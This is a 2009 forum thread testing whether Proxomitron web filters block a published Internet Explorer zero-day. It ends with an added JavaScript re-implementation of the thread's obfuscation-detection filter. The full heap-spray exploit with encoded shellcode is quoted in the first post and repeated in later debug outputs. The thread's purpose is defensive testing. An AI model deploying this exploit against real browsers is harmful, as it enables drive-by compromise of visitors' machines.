Zero-Day Internet Explorer Exploit Published
Nov. 22, 2009, 01:08 PM
Post: #1
Zero-Day Internet Explorer Exploit Published
Does sidki's filter set protect against this?

http://www.symantec.com/connect/blogs/ze...-published

Quote:A new exploit targeting Internet Explorer was published to the BugTraq mailing list yesterday. Symantec has conducted further tests and confirmed that it affects Internet Explorer versions 6 and 7 as well. The exploit currently exhibits signs of poor reliability, but we expect that a fully-functional reliable exploit will be available in the near future. When this happens, attackers will have the ability to insert the exploit into Web sites, infecting potential visitors. For an attacker to launch a successful attack, they must lure victims to their malicious Web page or a Web site they have compromised. In both cases, the attack requires JavaScript to exploit Internet Explorer.

Here is the code from BugTraq:
Code:
<!--
securitylab.ir
K4mr4n_st (at) yahoo (dot) com [email concealed]
-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<script>
function load(){
var e;
e=document.getElementsByTagName("STYLE")[0];
e.outerHTML="1";
}
</script>
<STYLE type="text/css">
body{ overflow: scroll; margin: 0; }
</style>

<SCRIPT language="javascript">
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u
0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u
543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u
89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u
0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u
7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<4000; x++) memory[x] = block + shellcode;
</script>

</HEAD>
<BODY onload="load()">
</BODY>
</HTML>

Thanks in advance.
Nov. 22, 2009, 02:13 PM
Post: #2
RE: Zero-Day Internet Explorer Exploit Published
I saved the code you posted as an *.html page and ran it on one of my Apache servers.

My anti-virus effectively stops it (while trying to save the code to an html page and when loading the page in a browser), but the latest Sidki out-of-the-box does not block it.

I tried enabling a few non-default web filters to see if they would stop it, but the only one that I found effective was the Header Filter, "! |||||||||||| 7.1 Block all Scripts 07.03.20 [sd] (o.3) (Out)".

Here's an excerpt of the debug output with stock settings using the latest beta:

Code:
<script>
function load(){
var e;
e=document
<Match: Block/Modify: Sel. JS Properties     07.04.02 [sd] (d.2) >
.getElementsByTagName("STYLE")[0
</Match>
.getElementsByTagName("STYLE")[0+1];
e.outerHTML="1";
}
</script>
<STYLE type="text/css">
body{ overflow: scroll; margin: 0; }
</style>

<SCRIPT language="javascript">
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u
0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u
543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u
89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u
0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u
7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<4000; x++) memory[x] = block + shellcode;
</script>


<Match: Header Bot Mark: Start - Fix </head>     09.06.29 (multi) [sd] (d.r) >
</HEAD>
</Match>

And here's the same excerpt with the aforementioned Header Filter activated:

Code:
<Match: <script> Block: All Scripts     08.11.18 (cch!) [srl] (d.0) >
<script>
</Match>
<script type=text/javascript src=data:text/javascript,var%20prxCountAd=++prxCountAd||1;>
function load(){
var e;
e=document.getElementsByTagName("STYLE")[0];
e.outerHTML="1";
}
</script>
<STYLE type="text/css">
body{ overflow: scroll; margin: 0; }
</style>


<Match: <script> Block: All Scripts     08.11.18 (cch!) [srl] (d.0) >
<SCRIPT language="javascript">
</Match>
<script type="text/javascript" src="data:text/javascript,var%20prxCountAd=++prxCountAd||1;">
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u
0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u
543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u
89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u
0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u
7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<4000; x++) memory[x] = block + shellcode;
</script>


<Match: Header Bot Mark: Start - Fix </head>     09.06.29 (multi) [sd] (d.r) >
</HEAD>
</Match>

This was a quick-and-dirty test, so my analysis is subject to being ripped apart. Smile!
Nov. 22, 2009, 02:32 PM
Post: #3
RE: Zero-Day Internet Explorer Exploit Published
Thanks for testing this, ProxoDent!

Now that I think of it, I have a filter which does the job nicely:
Code:
Name = "<script>: Remove Obfuscated Code"
Active = TRUE
URL = "($TYPE(htm)|$TYPE(js)|$TYPE(vbs))"
Bounds = "$NEST(<script,</script*>)"
Limit = 32767
Match = "*(\\([0-7]+{1,3}&&[#000:377])"
        "|(%|\\x)([a-f0-9])+{2}"
        "|(%|\\)u([a-f0-9])+{4}"
        "|\@([0-9])+{4,12}"
        ")+{5,*}*"
Replace = "<!-- PROX: Obfuscated Script removed -->$SET(script=)"

This is a modified version of a filter which was discussed in 2008, I believe.
Nov. 22, 2009, 02:41 PM
Post: #4
RE: Zero-Day Internet Explorer Exploit Published
(Nov. 22, 2009 02:32 PM)DarthTrader Wrote:  Thanks for testing this, ProxoDent!

Now that I think of it, I have a filter which does the job nicely:

Yes. That does it:

Code:
<script>
function load(){
var e;
e=document
<Match: Block/Modify: Sel. JS Properties     07.04.02 [sd] (d.2) >
.getElementsByTagName("STYLE")[0
</Match>
.getElementsByTagName("STYLE")[0+1];
e.outerHTML="1";
}
</script>
<STYLE type="text/css">
body{ overflow: scroll; margin: 0; }
</style>


<Match: <script>: Remove Obfuscated Code >
<SCRIPT language="javascript">
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u
0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u
543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u
89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u
0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u
7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<4000; x++) memory[x] = block + shellcode;
</script>
</Match>
<!-- PROX: Obfuscated Script removed -->


<Match: Header Bot Mark: Start - Fix </head>     09.06.29 (multi) [sd] (d.r) >
</HEAD>
</Match>
Nov. 22, 2009, 09:41 PM
Post: #5
RE: Zero-Day Internet Explorer Exploit Published
Yes, don't use Infected Explorer. Smile!
Nov. 22, 2009, 10:12 PM
Post: #6
RE: Zero-Day Internet Explorer Exploit Published
(Nov. 22, 2009 02:32 PM)DarthTrader Wrote:  Thanks for testing this, ProxoDent!

Now that I think of it, I have a filter which does the job nicely:
Code:
Name = "<script>: Remove Obfuscated Code"
Active = TRUE
URL = "($TYPE(htm)|$TYPE(js)|$TYPE(vbs))"
Bounds = "$NEST(<script,</script*>)"
Limit = 32767
Match = "*(\\([0-7]+{1,3}&&[#000:377])"
        "|(%|\\x)([a-f0-9])+{2}"
        "|(%|\\)u([a-f0-9])+{4}"
        "|\@([0-9])+{4,12}"
        ")+{5,*}*"
Replace = "<!-- PROX: Obfuscated Script removed -->$SET(script=)"

This is a modified version of a filter which was discussed in 2008, I believe.

Unfortunately, this filter also breaks a lot of others, for example:
http://www.youtube.com/watch?v=bU7j97ZIGdQ
Nov. 22, 2009, 11:32 PM
Post: #7
RE: Zero-Day Internet Explorer Exploit Published
Changing this:
Code:
"|(%|\\x)([a-f0-9])+{2}"
to this:
Code:
"|(%|\\x)([a-f0-9])+{4}"
seems to help.

Thanks for the heads up!
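To make the trade-off in this thread concrete, here is an added example (written for this page, not code from the thread or from Proxomitron) that re-implements the matching logic of DarthTrader's "<script>: Remove Obfuscated Code" filter in plain JavaScript and runs it over constructed script snippets with both the original `+{2}` hex alternative and the `+{4}` variant from the last post. The function names (`buildObfuscationPattern`, `isObfuscated`, `filterHtml`, `compareThresholds`), the sample inputs, and the translation of Proxomitron's `[#000:377]` range and `$NEST` bounds into ordinary regex classes are assumptions of this example.

```javascript
// Added example, not from the thread or Proxomitron: a detector for runs of
// escape-encoded characters inside <script> blocks, modelled on the
// "<script>: Remove Obfuscated Code" filter discussed above.
// Assumptions: Proxomitron's +{n} means "exactly n" repetitions, matching is
// case-insensitive, and [#000:377] is approximated by octal digit classes.

const REMOVED_MARKER = "<!-- PROX: Obfuscated Script removed -->";

// hexDigits mirrors the +{2} / +{4} knob from the thread.
function buildObfuscationPattern(hexDigits = 2) {
  const octal = String.raw`\\(?:[0-3][0-7]{2}|[0-7]{1,2})`; // \101   (octal 000-377)
  const hex   = String.raw`(?:%|\\x)[a-f0-9]{${hexDigits}}`; // %41 or \x41
  const uni   = String.raw`(?:%|\\)u[a-f0-9]{4}`;           // %u0041 or \u0041
  const at    = String.raw`@[0-9]{4,12}`;                    // @1234
  // Five or more escape sequences back to back is the trigger (+{5,*}).
  return new RegExp(`(?:${octal}|${hex}|${uni}|${at}){5,}`, "i");
}

function isObfuscated(scriptSource, hexDigits = 2) {
  return buildObfuscationPattern(hexDigits).test(scriptSource);
}

// Bounds = "$NEST(<script,</script*>)" approximated by a non-greedy block match.
const SCRIPT_BLOCK = /<script\b[\s\S]*?<\/script\s*>/gi;

// Replace every flagged <script> block with the marker; report how many were removed.
function filterHtml(html, hexDigits = 2) {
  let removed = 0;
  const out = html.replace(SCRIPT_BLOCK, (block) => {
    if (!isObfuscated(block, hexDigits)) return block;
    removed += 1;
    return REMOVED_MARKER;
  });
  return { html: out, removed };
}

// Constructed samples (not taken from any real page):
const SAMPLES = {
  // six %uXXXX escapes in a row, as a spray-style string would have
  escapeRun: `<script>var s = unescape("%u0041%u0042%u0043%u0044%u0045%u0046");</script>`,
  // ordinary URL encoding of "://?&" - five %XX escapes, entirely benign
  urlEncoded: `<script>var q = "%3A%2F%2F%3F%26"; location.search = q;</script>`,
  // five \xNN escapes, the two-digit form the +{4} change no longer sees
  hexRun: `<script>var t = "\\x41\\x42\\x43\\x44\\x45";</script>`,
  // no escapes at all
  plain: `<script>function load(){ var e = document.getElementsByTagName("STYLE")[0]; }</script>`,
};

// Run every sample under both thresholds; returns {sample: {two, four}} removal counts.
function compareThresholds() {
  const result = {};
  for (const [name, html] of Object.entries(SAMPLES)) {
    result[name] = {
      two: filterHtml(html, 2).removed,
      four: filterHtml(html, 4).removed,
    };
  }
  return result;
}

if (typeof require !== "undefined" && require.main === module) {
  console.table(compareThresholds());
}
```

With the `{2}` threshold every sample but `plain` is stripped, including the URL-encoded string, which is the kind of breakage reported for ordinary sites. With `{4}` the `%XX` false positive goes away, but so does detection of `\xNN` runs; only the `%uXXXX` / `\uXXXX` alternative still fires, so the tweak narrows the filter to four-digit escapes rather than making it smarter about context.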